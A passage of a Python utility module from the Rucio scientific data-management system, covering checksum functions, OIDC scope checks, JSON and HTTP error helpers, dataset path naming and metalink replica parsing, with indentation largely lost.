:returns : True or False
"""
if not scope:
scope = ""
if not audience:
audience = ""
if not required_scope:
required_scope = ""
if not required_audience:
required_audience = ""
if (isinstance(scope, list) and isinstance(audience, list) and # NOQA: W504
isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope for elem in required_scope)
req_audience_present = all(elem in audience for elem in required_audience)
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) and # NOQA: W504
isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = str(scope)
audience = str(audience)
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, list) and isinstance(audience, list) and # NOQA: W504
isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) and # NOQA: W504
isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = str(scope)
audience = str(audience)
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope)
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience)
return req_scope_present and req_audience_present
else:
return False
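# A small illustrative sketch of the claim check above; all scope/audience values
# are made-up examples.
def _example_oidc_claims_check():
    # list inputs: every required item must appear in the corresponding claim
    ok = all_oidc_req_claims_present(['openid', 'profile'], ['rucio'],
                                     ['openid'], ['rucio'])            # True
    # string inputs are split on the separator (a single space by default)
    missing = all_oidc_req_claims_present('openid', 'rucio',
                                          'openid profile', 'rucio')   # False
    return ok, missing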
def generate_uuid():
return str(uuid()).replace('-', '').lower()
def generate_uuid_bytes():
return uuid().bytes
def clean_headers(msg):
invalid_characters = ['\n', '\r']
for c in invalid_characters:
msg = str(msg).replace(c, ' ')
return msg
# GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5', 'sha256', 'crc32']
GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5']
CHECKSUM_ALGO_DICT = {}
PREFERRED_CHECKSUM = GLOBALLY_SUPPORTED_CHECKSUMS[0]
CHECKSUM_KEY = 'supported_checksums'
def is_checksum_valid(checksum_name):
"""
A simple function to check whether a checksum algorithm is supported.
Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.
:param checksum_name: The name of the checksum to be verified.
:returns: True if checksum_name is in GLOBALLY_SUPPORTED_CHECKSUMS list, False otherwise.
"""
return checksum_name in GLOBALLY_SUPPORTED_CHECKSUMS
def set_checksum_value(file, checksum_names_list):
for checksum_name in checksum_names_list:
if checksum_name in file['metadata'].keys() and file['metadata'][checksum_name]:
file['checksum'] = '%s:%s' % (checksum_name.upper(), str(file['metadata'][checksum_name]))
if checksum_name == PREFERRED_CHECKSUM:
break
def adler32(file):
"""
An Adler-32 checksum is obtained by calculating two 16-bit checksums A and B and concatenating their bits into a 32-bit integer. A is the sum of all bytes in the stream plus one, and B is the sum of the individual values of A from each step.
:param file: file name
:returns: Hexified string, padded to 8 values.
"""
# adler starting value is _not_ 0
adler = 1
try:
with open(file, 'rb') as openFile:
for line in openFile:
adler = zlib.adler32(line, adler)
except Exception as e:
raise Exception('FATAL - could not get Adler32 checksum of file %s - %s' % (file, e))
# backflip on 32bit
if adler < 0:
adler = adler + 2 ** 32
return str('%08x' % adler)
CHECKSUM_ALGO_DICT['adler32'] = adler32
def md5(file):
"""
Runs the MD5 algorithm (RFC-1321) on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
hash_md5 = hashlib.md5()
try:
with open(file, "rb") as f:
list(map(hash_md5.update, iter(lambda: f.read(4096), b"")))
except Exception as e:
raise Exception('FATAL - could not get MD5 checksum of file %s - %s' % (file, e))
return hash_md5.hexdigest()
CHECKSUM_ALGO_DICT['md5'] = md5
def sha256(file):
"""
Runs the SHA256 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 64 hexadecimal digits
"""
with open(file, "rb") as f:
bytes = f.read() # read entire file as bytes
readable_hash = hashlib.sha256(bytes).hexdigest()
print(readable_hash)
return readable_hash
CHECKSUM_ALGO_DICT['sha256'] = sha256
def crc32(file):
"""
Runs the CRC32 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: hexadecimal string of the CRC-32 digest (up to 8 digits)
"""
prev = 0
for eachLine in open(file, "rb"):
prev = zlib.crc32(eachLine, prev)
return "%X" % (prev & 0xFFFFFFFF)
CHECKSUM_ALGO_DICT['crc32'] = crc32
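# A brief sketch of computing a checksum by algorithm name via the registry
# filled in above; `path` is a placeholder for an existing local file. Note that
# sha256 and crc32 are registered but not part of GLOBALLY_SUPPORTED_CHECKSUMS.
def _example_checksum_by_name(path, algorithm='adler32'):
    if not is_checksum_valid(algorithm):
        raise ValueError('unsupported checksum algorithm: %s' % algorithm)
    return CHECKSUM_ALGO_DICT[algorithm](path)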
def str_to_date(string):
""" Converts a RFC-1123 string to the corresponding datetime value.
:param string: the RFC-1123 string to convert to datetime value.
"""
return datetime.datetime.strptime(string, DATE_FORMAT) if string else None
def val_to_space_sep_str(vallist):
""" Converts a list of values into a string of space separated values
:param vallist: the list of values to convert into a string
:return: the string of space separated values or the value initially passed as parameter
"""
try:
if isinstance(vallist, list):
return text_type(" ".join(vallist))
else:
return text_type(vallist)
except:
return text_type('')
def date_to_str(date):
""" Converts a datetime value to the corresponding RFC-1123 string.
:param date: the datetime value to convert.
"""
return datetime.datetime.strftime(date, DATE_FORMAT) if date else None
class APIEncoder(json.JSONEncoder):
""" Propretary JSONEconder subclass used by the json render function.
This is needed to address the encoding of special values.
"""
def default(self, obj): # pylint: disable=E0202
if isinstance(obj, datetime.datetime):
# convert any datetime to RFC 1123 format
return date_to_str(obj)
elif isinstance(obj, (datetime.time, datetime.date)):
# should not happen since the only date-like format
# supported at domain schema level is 'datetime'.
return obj.isoformat()
elif isinstance(obj, datetime.timedelta):
return obj.days * 24 * 60 * 60 + obj.seconds
elif isinstance(obj, EnumSymbol):
return obj.description
elif isinstance(obj, (InternalAccount, InternalScope)):
return obj.external
return json.JSONEncoder.default(self, obj)
def render_json(**data):
""" JSON render function
"""
return json.dumps(data, cls=APIEncoder)
def render_json_list(l):
""" JSON render function for list
"""
return json.dumps(l, cls=APIEncoder)
def datetime_parser(dct):
""" datetime parser
"""
for k, v in list(dct.items()):
if isinstance(v, string_types) and re.search(" UTC", v):
try:
dct[k] = datetime.datetime.strptime(v, DATE_FORMAT)
except Exception:
pass
return dct
def parse_response(data):
"""
JSON render function
"""
ret_obj = None
try:
ret_obj = data.decode('utf-8')
except AttributeError:
ret_obj = data
return json.loads(ret_obj, object_hook=datetime_parser)
def generate_http_error(status_code, exc_cls, exc_msg):
"""
Utility function to generate a complete HTTP error response.
:param status_code: The HTTP status code to generate a response for.
:param exc_cls: The name of the exception class to send with the response.
:param exc_msg: The error message.
:returns: a web.py HTTP response object.
"""
status = codes[status_code]
data = {'ExceptionClass': exc_cls,
'ExceptionMessage': exc_msg}
# Truncate too long exc_msg
if len(str(exc_msg)) > 15000:
exc_msg = str(exc_msg)[:15000]
headers = {'Content-Type': 'application/octet-stream',
'ExceptionClass': exc_cls,
'ExceptionMessage': clean_headers(exc_msg)}
try:
return HTTPError(status, headers=headers, data=render_json(**data))
except Exception:
print({'Content-Type': 'application/octet-stream', 'ExceptionClass': exc_cls, 'ExceptionMessage': str(exc_msg).strip()})
raise
def generate_http_error_flask(status_code, exc_cls, exc_msg):
"""
Utility function to generate a complete HTTP error response.
:param status_code: The HTTP status code to generate a response for.
:param exc_cls: The name of the exception class to send with the response.
:param exc_msg: The error message.
:returns: a Flask response object.
"""
data = {'ExceptionClass': exc_cls,
'ExceptionMessage': exc_msg}
# Truncate too long exc_msg
if len(str(exc_msg)) > 15000:
exc_msg = str(exc_msg)[:15000]
resp = Response(response=render_json(**data), status=status_code, content_type='application/octet-stream')
resp.headers['ExceptionClass'] = exc_cls
resp.headers['ExceptionMessage'] = clean_headers(exc_msg)
try:
return resp
except Exception:
print({'Content-Type': 'application/octet-stream', 'ExceptionClass': exc_cls, 'ExceptionMessage': str(exc_msg).strip()})
raise
def execute(cmd, blocking=True):
"""
Executes a command in a subprocess. Returns a tuple
of (exitcode, out, err), where out is the string output
from stdout and err is the string output from stderr when
executing the command.
:param cmd: Command string to execute
"""
process = subprocess.Popen(cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out = ''
err = ''
exitcode = 0
if blocking:
result = process.communicate()
(out, err) = result
exitcode = process.returncode
return exitcode, out, err
return process
def rse_supported_protocol_operations():
""" Returns a list with operations supported by all RSE protocols."""
return ['read', 'write', 'delete', 'third_party_copy']
def rse_supported_protocol_domains():
""" Returns a list with all supoorted RSE protocol domains."""
return ['lan', 'wan']
def grouper(iterable, n, fillvalue=None):
""" Collect data into fixed-length chunks or blocks """
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(*args, fillvalue=fillvalue)
def chunks(l, n):
"""
Yield successive n-sized chunks from l.
"""
for i in range(0, len(l), n):
yield l[i:i + n]
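# A tiny sketch contrasting the two helpers above: grouper() pads the last group
# with fillvalue, while chunks() simply yields a shorter final piece.
def _example_grouping():
    padded = list(grouper('ABCDEFG', 3, fillvalue='x'))  # [('A','B','C'), ('D','E','F'), ('G','x','x')]
    ragged = list(chunks(list('ABCDEFG'), 3))            # [['A','B','C'], ['D','E','F'], ['G']]
    return padded, ragged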
def my_key_generator(namespace, fn, **kw):
"""
Customized key generator for dogpile
"""
fname = fn.__name__
def generate_key(*arg, **kw):
return namespace + "_" + fname + "_".join(str(s) for s in filter(None, arg))
return generate_key
def get_logger(name):
logger = getLogger(name)
hdlr = RotatingFileHandler('%s/%s.log' % (config_get('common', 'logdir'), name), maxBytes=1000000000, backupCount=10)
formatter = Formatter('%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(config_get('common', 'loglevel').upper())
return logger
def construct_surl_DQ2(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains DQ2 convention. To be used for non-deterministic sites.
Method imported from DQ2.
@return: relative SURL for new replica.
@rtype: str
"""
# check how many dots in dsn
fields = dsn.split('.')
nfields = len(fields)
if nfields == 0:
return '/other/other/%s' % (filename)
elif nfields == 1:
stripped_dsn = __strip_dsn(dsn)
return '/other/%s/%s' % (stripped_dsn, filename)
elif nfields == 2:
project = fields[0]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s' % (project, stripped_dsn, filename)
elif nfields < 5 or re.match('user*|group*', fields[0]):
project = fields[0]
f2 = fields[1]
f3 = fields[2]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, f2, f3, stripped_dsn, filename)
else:
project = fields[0]
dataset_type = fields[4]
if nfields == 5:
tag = 'other'
else:
tag = __strip_tag(fields[-1])
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, dataset_type, tag, stripped_dsn, filename)
def construct_surl_T0(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains Tier0 convention. To be used for non-deterministic sites.
@return: relative SURL for new replica.
@rtype: str
"""
fields = dsn.split('.')
nfields = len(fields)
if nfields >= 3:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], fields[1], dsn, filename)
elif nfields == 1:
return '/%s/%s/%s/%s/%s' % (fields[0], 'other', 'other', dsn, filename)
elif nfields == 2:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[1], 'other', dsn, filename)
elif nfields == 0:
return '/other/other/other/other/%s' % (filename)
def construct_surl_BelleII(dsn, filename):
"""
Defines relative SURL for Belle II specific replicas.
This method contains the Belle II convention.
To be used for non-deterministic Belle II sites.
DSN (or datablock in the Belle II naming) contains /
"""
fields = dsn.split("/")
nfields = len(fields)
if nfields == 0:
return '/other/%s' % (filename)
else:
return '%s/%s' % (dsn, filename)
_SURL_ALGORITHMS = {}
_DEFAULT_SURL = 'DQ2'
def register_surl_algorithm(surl_callable, name=None):
if name is None:
name = surl_callable.__name__
_SURL_ALGORITHMS[name] = surl_callable
register_surl_algorithm(construct_surl_T0, 'T0')
register_surl_algorithm(construct_surl_DQ2, 'DQ2')
register_surl_algorithm(construct_surl_BelleII, 'BelleII')
def construct_surl(dsn, filename, naming_convention=None):
# ensure that policy package is loaded in case it registers its own algorithms
import rucio.common.schema # noqa: F401
if naming_convention is None or naming_convention not in _SURL_ALGORITHMS:
naming_convention = _DEFAULT_SURL
return _SURL_ALGORITHMS[naming_convention](dsn, filename)
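# An illustrative sketch of the SURL registry above; the DSN and filename are
# made-up examples and no particular output path is implied.
def _example_construct_surl():
    dsn = 'mc15_13TeV.12345.PowhegPythia8.recon.AOD.e123_s456_r789'
    filename = 'AOD.12345._000001.pool.root.1'
    default_surl = construct_surl(dsn, filename)                        # DQ2 convention (default)
    tier0_surl = construct_surl(dsn, filename, naming_convention='T0')
    return default_surl, tier0_surl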
def __strip_dsn(dsn):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in.
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_frag']
fields = dsn.split('.')
last_field = fields[-1]
try:
for suffix in suffixes_to_drop:
last_field = re.sub('%s.*$' % suffix, '', last_field)
except IndexError:
return dsn
fields[-1] = last_field
stripped_dsn = '.'.join(fields)
return stripped_dsn
def __strip_tag(tag):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_tid']
stripped_tag = tag
try:
for suffix in suffixes_to_drop:
stripped_tag = re.sub('%s.*$' % suffix, '', stripped_tag)
except IndexError:
return stripped_tag
return stripped_tag
def clean_surls(surls):
res = []
for surl in surls:
if surl.startswith('srm'):
surl = re.sub(':[0-9]+/', '/', surl)
surl = re.sub('/srm/managerv1\?SFN=', '', surl) # NOQA: W605
surl = re.sub('/srm/v2/server\?SFN=', '', surl) # NOQA: W605
surl = re.sub('/srm/managerv2\?SFN=', '', surl) # NOQA: W605
res.append(surl)
res.sort()
return res
_EXTRACT_SCOPE_ALGORITHMS = {}
_DEFAULT_EXTRACT = 'atlas'
def extract_scope_atlas(did, scopes):
# Try to extract the scope from the DSN
if did.find(':') > -1:
if len(did.split(':')) > 2:
raise RucioException('Too many colons. Cannot extract scope and name')
scope, name = did.split(':')[0], did.split(':')[1]
if name.endswith('/'):
name = name[:-1]
return scope, name
else:
scope = did.split('.')[0]
if did.startswith('user') or did.startswith('group'):
scope = ".".join(did.split('.')[0:2])
if did.endswith('/'):
did = did[:-1]
return scope, did
def extract_scope_belleii(did, scopes):
split_did = did.split('/')
if did.startswith('/belle/MC/'):
if len(split_did) > 4:
if split_did[3] in ['fab', 'merge1', 'skim']:
return 'mc_tmp', did
return 'mc', did
if did.startswith('/belle/Raw/'):
return 'raw', did
if did.startswith('/belle/user/'):
if len(split_did) > 4:
if len(split_did[3]) == 1 and 'user.%s' % (split_did[4]) in scopes:
return 'user.%s' % split_did[4], did
if len(split_did) > 3:
if 'user.%s' % (split_did[3]) in scopes:
return 'user.%s' % split_did[3], did
return 'user', did
if did.startswith('/belle/data/') or did.startswith('/belle/Data/'):
if len(split_did) > 4:
if split_did[3] in ['fab', 'skim']:
return 'data_tmp', did
return 'data', did
if did.startswith('/belle/ddm/functional_tests/') or did.startswith('/belle/ddm/tests/'):
return 'test', did
return 'other', did
def register_extract_scope_algorithm(extract_callable, name=None):
if name is None:
name = extract_callable.__name__
_EXTRACT_SCOPE_ALGORITHMS[name] = extract_callable
register_extract_scope_algorithm(extract_scope_atlas, 'atlas')
register_extract_scope_algorithm(extract_scope_belleii, 'belleii')
def extract_scope(did, scopes=None):
extract_scope_convention = config_get('common', 'extract_scope', False, None)
if extract_scope_convention is None or extract_scope_convention not in _EXTRACT_SCOPE_ALGORITHMS:
extract_scope_convention = _DEFAULT_EXTRACT
return _EXTRACT_SCOPE_ALGORITHMS[extract_scope_convention](did=did, scopes=scopes)
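# A brief sketch of the ATLAS scope extraction with made-up DIDs: an explicit
# "scope:name" form wins, otherwise the scope is derived from the leading
# dot-separated field(s).
def _example_extract_scope_atlas():
    explicit = extract_scope_atlas('mc15_13TeV:EVNT.12345._000001.pool.root', scopes=None)
    # ('mc15_13TeV', 'EVNT.12345._000001.pool.root')
    user_did = extract_scope_atlas('user.jdoe.test.dataset', scopes=None)
    # ('user.jdoe', 'user.jdoe.test.dataset')
    return explicit, user_did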
def pid_exists(pid):
"""
Check whether pid exists in the current process table.
UNIX only.
"""
if pid < 0:
return False
if pid == 0:
# According to "man 2 kill" PID 0 refers to every process
# in the process group of the calling process.
# On certain systems 0 is a valid PID but we have no way
# to know that in a portable fashion.
raise ValueError('invalid PID 0')
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
def sizefmt(num, human=True):
"""
Return a human-readable file size string.
"""
if num is None:
return '0.0 B'
try:
num = int(num)
if human:
for unit in ['', 'k', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1000.0:
return "%3.3f %sB" % (num, unit)
num /= 1000.0
return "%.1f %sB" % (num, 'Y')
else:
return str(num)
except OverflowError:
return 'Inf'
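# A couple of illustrative values for the size formatter above (decimal units).
def _example_sizefmt():
    return (sizefmt(1234),                    # '1.234 kB'
            sizefmt(123456789),               # '123.457 MB'
            sizefmt(123456789, human=False))  # '123456789'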
def get_tmp_dir():
"""
Get a path where to store temporary files.
Rucio searches a standard list of temporary directories. The list is:
The directory named by the TMP environment variable.
The directory named by the TMPDIR environment variable.
The directory named by the TEMP environment variable.
As a last resort, the /tmp/ directory.
:return: A path.
"""
base_dir = os.path.abspath(tempfile.gettempdir())
try:
return os.path.join(base_dir, getpass.getuser())
except Exception:
pass
try:
return os.path.join(base_dir, str(os.getuid()))
except Exception:
pass
return base_dir
def is_archive(name):
'''
Check if a file name is an archive file or not.
:return: A boolean.
'''
regexp = r'^.*\.(zip|zipx|tar.gz|tgz|tar.Z|tar.bz2|tbz2)(\.\d+)*$'
if re.match(regexp, name, re.I):
return True
return False
class Color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def detect_client_location():
"""
Open a UDP socket to a machine on the internet, to get the local IPv4 and IPv6
addresses of the requesting client.
Try to determine the sitename automatically from common environment variables,
in this order: SITE_NAME, ATLAS_SITE_NAME, OSG_SITE_NAME. If none of these exist
use the fixed string 'ROAMING'.
"""
ip = '0.0.0.0'
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
except Exception:
pass
ip6 = '::'
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(("2001:4860:4860:0:0:0:0:8888", 80))
ip6 = s.getsockname()[0]
except Exception:
pass
site = os.environ.get('SITE_NAME',
os.environ.get('ATLAS_SITE_NAME',
os.environ.get('OSG_SITE_NAME',
'ROAMING')))
return {'ip': ip,
'ip6': ip6,
'fqdn': socket.getfqdn(),
'site': site}
def ssh_sign(private_key, message):
"""
Sign a string message using the private key.
:param private_key: The SSH RSA private key as a string.
:param message: The message to sign as a string.
:return: Base64 encoded signature as a string.
"""
if PY3 and isinstance(message, str):
message = message.encode()
if not EXTRA_MODULES['paramiko']:
raise MissingModuleException('The paramiko module is not installed or faulty.')
sio_private_key = StringIO(private_key)
priv_k = RSAKey.from_private_key(sio_private_key)
sio_private_key.close()
signature_stream = priv_k.sign_ssh_data(message)
signature_stream.rewind()
base64_encoded = base64.b64encode(signature_stream.get_remainder())
if PY3:
base64_encoded = base64_encoded.decode()
return base64_encoded
def make_valid_did(lfn_dict):
"""
When managing information about a LFN (such as in `rucio upload` or
the RSE manager's upload), we add the `filename` attribute to record
the name of the file on the local disk in addition to the remainder
of the DID information.
This function will take that python dictionary, and strip out the
additional `filename` key. If this is not done, then the dictionary
will not pass the DID JSON schema validation.
"""
lfn_copy = dict(lfn_dict)
lfn_copy['name'] = lfn_copy.get('name', lfn_copy['filename'])
del lfn_copy['filename']
return lfn_copy
def send_trace(trace, trace_endpoint, user_agent, retries=5):
"""
Send the given trace to the trace endpoint
:param trace: the trace dictionary to send
:param trace_endpoint: the endpoint where the trace should be sent
:param user_agent: the user agent sending the trace
:param retries: the number of retries if sending fails
:return: 0 on success, 1 on failure
"""
if user_agent.startswith('pilot'):
return 0
for dummy in range(retries):
try:
requests.post(trace_endpoint + '/traces/', verify=False, data=json.dumps(trace))
return 0
except Exception:
pass
return 1
def add_url_query(url, query):
"""
Add a new dictionary to URL parameters
:param url: The existing URL
:param query: A dictionary containing key/value pairs to be added to the URL
:return: The expanded URL with the new query parameters
"""
url_parts = list(urlparse.urlparse(url))
mod_query = dict(urlparse.parse_qsl(url_parts[4]))
mod_query.update(query)
url_parts[4] = urlencode(mod_query)
return urlparse.urlunparse(url_parts)
def get_bytes_value_from_string(input_string):
"""
Get bytes from a string that represents a storage value and unit
:param input_string: String containing a value and a unit
:return: Integer value representing the value in bytes
"""
result = re.findall('^([0-9]+)([A-Za-z]+)$', input_string)
if result:
value = int(result[0][0])
unit = result[0][1].lower()
if unit == 'b':
value = value
elif unit == 'kb':
value = value * 1000
elif unit == 'mb':
value = value * 1000000
elif unit == 'gb':
value = value * 1000000000
elif unit == 'tb':
value = value * 1000000000000
elif unit == 'pb':
value = value * 1000000000000000
else:
return False
return value
else:
return False
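# A short sketch of the size parser above; strings that do not match the
# "<digits><unit>" pattern yield False.
def _example_bytes_from_string():
    return (get_bytes_value_from_string('10MB'),   # 10000000
            get_bytes_value_from_string('2gb'),    # 2000000000
            get_bytes_value_from_string('10 MB'))  # False (space breaks the pattern)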
def parse_did_filter_from_string(input_string):
"""
Parse DID filter options in format 'length<3,type=all' from string.
:param input_string: String containing the filter options.
:return: filter dictionary and type as string.
"""
filters = {}
type = 'collection'
if input_string:
filter_options = input_string.replace(' ', '').split(',')
for option in filter_options:
value = None
key = None
if '>=' in option:
key, value = option.split('>=')
if key == 'length':
key = 'length.gte'
elif '>' in option:
key, value = option.split('>')
if key == 'length':
key = 'length.gt'
elif '<=' in option:
key, value = option.split('<=')
if key == 'length':
key = 'length.lte'
elif '<' in option:
key, value = option.split('<')
if key == 'length':
key = 'length.lt'
elif '=' in option:
key, value = option.split('=')
if key == 'created_after' or key == 'created_before':
value = datetime.datetime.strptime(value, '%Y-%m-%dT%H:%M:%S.%fZ')
if key == 'type':
if value.upper() in ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']:
type = value.lower()
else:
raise InvalidType('{0} is not a valid type. Valid types are {1}'.format(value, ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']))
elif key in ('length.gt', 'length.lt', 'length.gte', 'length.lte', 'length'):
try:
value = int(value)
filters[key] = value
except ValueError:
raise ValueError('Length has to be an integer value.')
filters[key] = value
elif isinstance(value, string_types):
if value.lower() == 'true':
value = '1'
elif value.lower() == 'false':
value = '0'
filters[key] = value
else:
filters[key] = value
return filters, type
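# An illustrative call to the filter parser above, using a made-up filter string
# in the documented 'length<3,type=all' style.
def _example_parse_did_filter():
    filters, did_type = parse_did_filter_from_string('length>=3,type=dataset,account=jdoe')
    # filters == {'length.gte': 3, 'account': 'jdoe'}; did_type == 'dataset'
    return filters, did_type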
def parse_replicas_from_file(path):
"""
Parses the output of list_replicas from a json or metalink file
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param path: the path to the input file
:returns: a list with a dictionary for each file
"""
with open(path) as fp:
try:
root = ElementTree.parse(fp).getroot()
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.load(fp)
except ValueError as json_err:
raise MetalinkJsonParsingError(path, xml_err, json_err)
def parse_replicas_from_string(string):
"""
Parses the output of list_replicas from a json or metalink string
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param string: the string to parse
:returns: a list with a dictionary for each file
"""
try:
root = ElementTree.fromstring(string)
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.loads(string)
except ValueError as json_err:
raise MetalinkJsonParsingError(string, xml_err, json_err)
def parse_replicas_metalink(root):
"""
Transforms the metalink tree into a list of dictionaries where
each dictionary describes a file with its replicas.
Will be called by parse_replicas_from_file and parse_replicas_from_string.
:param root: root node of the metalink tree
:returns: a list with a dictionary for each file
"""
files = []
# metalink namespace
ns = '{urn:ietf:params:xml:ns:metalink}'
str_to_bool = {'true': True, 'True': True, 'false': False, 'False': False}
# loop over all <file> tags of the metalink string
for file_tag_obj in root.findall(ns + 'file'):
# search for identity-tag
identity_tag_obj = file_tag_obj.find(ns + 'identity')
if not ElementTree.iselement(identity_tag_obj):
raise InputValidationError('Failed to locate identity-tag inside %s' % ElementTree.tostring(file_tag_obj))
cur_file = {'did': identity_tag_obj.text,
'adler32': None,
'md5': None,
'sources': []}
parent_dids = set()
parent_dids_tag_obj = file_tag_obj.find(ns + 'parents')
if ElementTree.iselement(parent_dids_tag_obj):
for did_tag_obj in parent_dids_tag_obj.findall(ns + 'did'):
parent_dids.add(did_tag_obj.text)
cur_file['parent_dids'] = parent_dids
size_tag_obj = file_tag_obj.find(ns + 'size')
cur_file['bytes'] = int(size_tag_obj.text) if ElementTree.iselement(size_tag_obj) else None
for hash_tag_obj in file_tag_obj.findall(ns + 'hash'):
hash_type = hash_tag_obj.get('type')
if hash_type:
cur_file[hash_type] = hash_tag_obj.text
for url_tag_obj in file_tag_obj.findall(ns + 'url'):
key_rename_map = {'location': 'rse'}
src = {}
for k, v in url_tag_obj.items():
k = key_rename_map.get(k, k)
src[k] = str_to_bool.get(v, v)
src['pfn'] = url_tag_obj.text
cur_file['sources'].append(src)
files.append(cur_file)
return files
def get_thread_with_periodic_running_function(interval, action, graceful_stop):
"""
Get a thread where a function runs periodically.
:param interval: Interval in seconds when the action function should run.
:param action: Function, that should run periodically.
:param graceful_stop: Threading event used to check for graceful stop.
"""
def start():
while not graceful_stop.is_set():
starttime = time.time()
action()
time.sleep(max(0, interval - (time.time() - starttime)))
t = threading.Thread(target=start)
return t
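# A minimal usage sketch for the periodic-thread helper above; `action` is any
# caller-supplied callable and the event doubles as the stop flag.
def _example_periodic_thread(action, run_for_seconds=10):
    graceful_stop = threading.Event()
    t = get_thread_with_periodic_running_function(2, action, graceful_stop)
    t.start()
    time.sleep(run_for_seconds)
    graceful_stop.set()  # the loop exits before its next iteration
    t.join()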
def run_cmd_process(cmd, timeout=3600):
"""
shell command parser with timeout
:param cmd: shell command as a string
:param timeout: in seconds
:return: the return code and stdout (stderr is appended to stdout when present)
"""
# use time.time() so the elapsed time is measured in real seconds
time_start = time.time()
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
running_time = 0
while process.poll() is None and running_time < timeout:
    running_time = int(time.time() - time_start)
time.sleep(3)
if process.poll() is None:
process.terminate()
time.sleep(3)
if process.poll() is None:
process.kill()
stdout, stderr = process.communicate()
if not stderr:
stderr = ''
if not stdout:
stdout = ''
if stderr and stderr != '':
stdout += " Error: " + stderr
if process:
returncode = process.returncode
else:
returncode = 1
if returncode != 1 and 'Command time-out' in stdout:
returncode = 1
if returncode is None:
returncode = 0
return returncode, stdout
def api_update_return_dict(dictionary):
"""
Ensure that rse is in a dictionary returned from core
:param dictionary: The dictionary to edit
:returns dictionary: The edited dictionary
"""
if not isinstance(dictionary, dict):
return dictionary
copied = False # Avoid side effects from pass by object
for rse_str in ['rse', 'src_rse', 'source_rse', 'dest_rse', 'destination_rse']:
rse_id_str = '%s_id' % rse_str
if rse_id_str in dictionary.keys() and dictionary[rse_id_str] is not None:
if rse_str not in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
import rucio.core.rse
dictionary[rse_str] = rucio.core.rse.get_rse_name(rse_id=dictionary[rse_id_str])
if 'account' in dictionary.keys() and dictionary['account'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['account'] = dictionary['account'].external
if 'scope' in dictionary.keys() and dictionary['scope'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['scope'] = dictionary['scope'].external
return dictionary
def get_parsed_throttler_mode(throttler_mode):
""" Parse the conveyor-throttler mode string. """
direction = None
all_activities = None
if throttler_mode == 'DEST_PER_ACT':
direction = 'destination'
all_activities = False
elif throttler_mode == 'DEST_PER_ALL_ACT':
direction = 'destination'
all_activities = True
elif throttler_mode == 'SRC_PER_ACT':
direction = 'source'
all_activities = False
elif throttler_mode == 'SRC_PER_ALL_ACT':
direction = 'source'
all_activities = True
return (direction, all_activities)
def query_bunches(query, bunch_by):
"""
